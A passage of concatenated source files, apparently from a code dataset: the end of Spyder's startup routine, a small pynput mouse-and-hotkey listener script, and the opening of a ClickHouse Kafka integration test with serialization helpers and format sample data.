"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize or bool(DEBUG))
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(
None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>spyder --reset</b></span>"
"<br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If Spyder still fails to launch, you should consult our "
"comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
"which when followed carefully solves the vast majority of "
"crashes; also, take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"submitting a report to our <a href=\"%s\">issue tracker</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __trouble_url__, __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('main', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occured
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
picker.py | import threading
from pynput import keyboard
from pynput import mouse
"""
monitor the mouse: x, y
paint the x, y, w, h box with red color
monitor the ctrl-keyboard
generate the position index value
"""
def on_move(x, y):
# print('Pointer moved to {0}'.format(
# (x, y)))
pass
def on_activate_h():
print('on_activate_h')
def monitoring_mouse():
with mouse.Listener(
on_move=on_move) as listener:
listener.join()
mouse.Listener(
on_move=on_move).start()
def monitoring_keyboard():
with keyboard.GlobalHotKeys({'<ctrl>': on_activate_h}) as h:
h.join()
threading.Thread(target=monitoring_mouse).start()
threading.Thread(target=monitoring_keyboard).start()
print("monitoring the mouse and keyboard")
|
test.py | import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import ast
import math
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
from . import message_with_repeated_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/named_collection.xml'],
user_configs=['configs/users.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
topics_list = [NewTopic(name=topic_name, num_partitions=num_partitions, replication_factor=replication_factor, topic_configs=config)]
retries = 0
while True:
try:
admin_client.create_topics(new_topics=topics_list, validate_only=False)
logging.debug("Admin client succeed")
return
except Exception as e:
retries += 1
time.sleep(0.5)
if retries < max_retries:
logging.warning(f"Failed to create topic {e}")
else:
raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
result = admin_client.delete_topics([topic])
for (topic, e) in result.topic_error_codes:
if e == 0:
logging.debug(f"Topic {topic} deleted")
else:
logging.error(f"Failed to delete topic {topic}: {e}")
retries = 0
while True:
topics_listed = admin_client.list_topics()
logging.debug(f"TOPICS LISTED: {topics_listed}")
if topic not in topics_listed:
return
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic, needDecode = True, timestamp = 0):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
assert timestamp == 0 or message.timestamp / 1000 == timestamp
if needDecode:
yield message.value.decode()
else:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n')
SETTINGS kafka_commit_on_select = 1;
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_commit_on_select = 1,
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_commit_on_select = 1,
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'CustomSeparated' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
},
'Template' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
],
'extra_settings': ", format_template_row='template_row.format'"
},
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
